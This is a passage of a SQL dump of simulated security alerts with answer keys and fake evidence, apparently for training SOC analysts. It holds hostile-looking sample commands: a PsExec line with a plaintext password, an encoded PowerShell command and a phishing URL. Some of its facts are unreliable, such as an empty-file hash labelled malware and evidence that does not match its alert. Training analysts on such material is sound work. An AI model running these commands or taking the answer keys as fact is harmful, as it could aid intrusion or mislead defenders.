(759, 'AWS S3 Bucket Exposed to Public', 'high', 'AWS GuardDuty', 'An AWS S3 bucket has been detected with public read permissions enabled, potentially exposing sensitive data.', 'Data Exposure', 'T1530', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T08:45:00Z\",\"event_type\":\"configuration_change\",\"src_ip\":\"192.168.1.5\",\"dst_ip\":\"N/A\",\"username\":\"admin@example.com\",\"hostname\":\"aws-s3-bucket\",\"request_body\":\"PUT /public-access-block\",\"command_line\":\"N/A\"}', '2026-01-09 23:33:08', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"admin@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Administrative user account for AWS management\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"PUT /public-access-block\",\"is_critical\":true,\"osint_result\":{\"source\":\"AWS Documentation\",\"verdict\":\"suspicious\",\"details\":\"Public access block configuration change detected\"}}],\"expected_actions\":[\"close_alert\",\"audit_configuration\",\"notify_admin\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The S3 bucket was configured with public access, posing a risk of data exposure.\"}', 'Novice', 'DLP', 1, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.407Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin@example.com\\\",\\\"hostname\\\":\\\"aws-s3-bucket\\\",\\\"request_body\\\":\\\"PUT 
/public-access-block\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.407Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin@example.com\\\",\\\"hostname\\\":\\\"aws-s3-bucket\\\",\\\"request_body\\\":\\\"PUT /public-access-block\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.407Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin@example.com\\\",\\\"hostname\\\":\\\"aws-s3-bucket\\\",\\\"request_body\\\":\\\"PUT /public-access-block\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.407Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin@example.com\\\",\\\"hostname\\\":\\\"aws-s3-bucket\\\",\\\"request_body\\\":\\\"PUT /public-access-block\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.407Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin@example.com\\\",\\\"hostname\\\":\\\"aws-s3-bucket\\\",\\\"request_body\\\":\\\"PUT /public-access-block\\\",\\\"command_line\\\":\\\"N/A\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(760, 'Multiple Failed Login Attempts Detected', 'medium', 'Splunk', 'A foreign IP address has been detected making multiple failed login attempts to the AWS console.', 'Credential Attack', 'T1110', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T09:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"N/A\",\"username\":\"j.doe@example.com\",\"hostname\":\"aws-console\",\"request_body\":\"N/A\",\"command_line\":\"N/A\"}', '2026-01-10 09:16:29', '2026-02-17 22:35:23', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"j.doe@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User account for AWS console access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP address is associated with known malicious activity and attempted unauthorized access.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.409Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"j.doe@example.com\\\",\\\"hostname\\\":\\\"aws-console\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.409Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"j.doe@example.com\\\",\\\"hostname\\\":\\\"aws-console\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.409Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"j.doe@example.com\\\",\\\"hostname\\\":\\\"aws-console\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.409Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"j.doe@example.com\\\",\\\"hostname\\\":\\\"aws-console\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.409Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"j.doe@example.com\\\",\\\"hostname\\\":\\\"aws-console\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"N/A\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(761, 'Malicious File Executed on Azure VM', 'critical', 'Microsoft Defender for Cloud', 'A known malicious file was executed on an Azure Virtual Machine, indicating a potential compromise.', 'Malware', 'T1059', 1, 'Closed', 95, '{\"timestamp\":\"2026-01-11T11:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.4\",\"dst_ip\":\"N/A\",\"username\":\"vm-user\",\"hostname\":\"azure-vm-01\",\"request_body\":\"N/A\",\"command_line\":\"C:\\\\malware\\\\badfile.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-09 15:49:24', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected by 50+ antivirus engines\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malware\\\\badfile.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Known malicious executable\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file executed is a known malicious program, posing a threat to the system.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.409Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.4\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"vm-user\\\",\\\"hostname\\\":\\\"azure-vm-01\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malware\\\\\\\\badfile.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.409Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.4\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"vm-user\\\",\\\"hostname\\\":\\\"azure-vm-01\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malware\\\\\\\\badfile.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.409Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.4\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"vm-user\\\",\\\"hostname\\\":\\\"azure-vm-01\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malware\\\\\\\\badfile.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.409Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.4\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"vm-user\\\",\\\"hostname\\\":\\\"azure-vm-01\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malware\\\\\\\\badfile.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.409Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.4\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"vm-user\\\",\\\"hostname\\\":\\\"azure-vm-01\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malware\\\\\\\\badfile.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(762, 'Unusual Spike in Cloud Resource Usage', 'low', 'AWS CloudWatch', 'An unusual increase in compute resources was detected in AWS, suggesting potential crypto mining activity.', 'Anomaly', 'T1496', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T10:00:00Z\",\"event_type\":\"resource_usage\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"N/A\",\"username\":\"aws-user\",\"hostname\":\"aws-ec2-instance\",\"request_body\":\"N/A\",\"command_line\":\"N/A\"}', '2026-01-11 03:05:12', '2026-02-16 17:38:23', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the cloud instance\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"aws-user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"AWS user account managing the instance\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"anomaly\",\"analysis_notes\":\"The increased resource usage is attributed to a legitimate workload spike by the user.\"}', 'Novice', 'CLOUD', 1, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.410Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:00:00Z\\\",\\\"event_type\\\":\\\"resource_usage\\\",\\\"src_ip\\\":\\\"192.168.3.10\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"aws-user\\\",\\\"hostname\\\":\\\"aws-ec2-instance\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.410Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:00:00Z\\\",\\\"event_type\\\":\\\"resource_usage\\\",\\\"src_ip\\\":\\\"192.168.3.10\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"aws-user\\\",\\\"hostname\\\":\\\"aws-ec2-instance\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.410Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:00:00Z\\\",\\\"event_type\\\":\\\"resource_usage\\\",\\\"src_ip\\\":\\\"192.168.3.10\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"aws-user\\\",\\\"hostname\\\":\\\"aws-ec2-instance\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.410Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:00:00Z\\\",\\\"event_type\\\":\\\"resource_usage\\\",\\\"src_ip\\\":\\\"192.168.3.10\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"aws-user\\\",\\\"hostname\\\":\\\"aws-ec2-instance\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.410Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:00:00Z\\\",\\\"event_type\\\":\\\"resource_usage\\\",\\\"src_ip\\\":\\\"192.168.3.10\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"aws-user\\\",\\\"hostname\\\":\\\"aws-ec2-instance\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"N/A\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(763, 'Suspicious PowerShell Encoded Command Execution Detected', 'high', 'CrowdStrike', 'A PowerShell process executed with an encoded command, potentially indicating a script-based attack leveraging Living-off-the-Land techniques.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.15.23\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"WIN-4D5G6H7J8\",\"request_body\":\"\",\"command_line\":\"powershell.exe -enc JAB2AGkAcgB1AHMAdABvAGwAPQAiAG0AYQBsAGkAYwBpAG8AdQBzACIAOwBBAHMAcwBlAHQAIABWAGkAcgB1AHMAdABvAGwA\"}', '2026-01-11 17:29:28', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -enc JAB2AGkAcgB1AHMAdABvAGwAPQAiAG0AYQBsAGkAYwBpAG8AdQBzACIAOwBBAHMAcwBlAHQAIABWAGkAcgB1AHMAdABvAGwA\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell commands are often used in malware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used by the organization\'s network.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell indicates an attempt to bypass detection mechanisms.\"}', 'Advanced', 'EDR', 8, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(764, 'Lateral Movement via PSExec Tool Detected', 'critical', 'Wazuh', 'Suspicious PSExec activity detected, indicating potential lateral movement within the network.', 'Lateral Movement', 'T1569.002', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T11:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"10.0.0.25\",\"username\":\"admin\",\"hostname\":\"CORP-SERVER1\",\"request_body\":\"\",\"command_line\":\"psexec.exe \\\\\\\\10.0.0.25 -u admin -p password cmd.exe\"}', '2026-01-11 17:29:28', '2026-02-16 18:02:10', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used by the organization\'s network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used by the organization\'s network.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\10.0.0.25 -u admin -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec is commonly used in lateral movement attacks.\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec usage from an internal source indicates lateral movement attempts.\"}', 'Advanced', 'EDR', 8, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.412Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\10.0.0.25 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.412Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\10.0.0.25 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.412Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\10.0.0.25 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.412Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\10.0.0.25 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.412Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\10.0.0.25 -u admin -p password cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(765, 'Malicious Email with Phishing Link Detected', 'medium', 'Proofpoint', 'An email containing a known phishing link was detected and flagged for review.', 'Phishing', 'T1566.001', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:30:12Z\",\"event_type\":\"email_received\",\"src_ip\":\"\",\"dst_ip\":\"\",\"username\":\"hr@company.com\",\"hostname\":\"\",\"request_body\":\"\",\"command_line\":\"\",\"email_sender\":\"support@fakebank.com\",\"url\":\"http://maliciouslink.com/login\"}', '2026-01-11 17:29:28', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"support@fakebank.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Email address associated with phishing activity.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://maliciouslink.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"URL is a known phishing site.\"}}],\"expected_actions\":[\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The presence of a known phishing link in the email confirms the threat.\"}', 'Advanced', 'SIEM', 8, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Malicious Email with Phishing Link 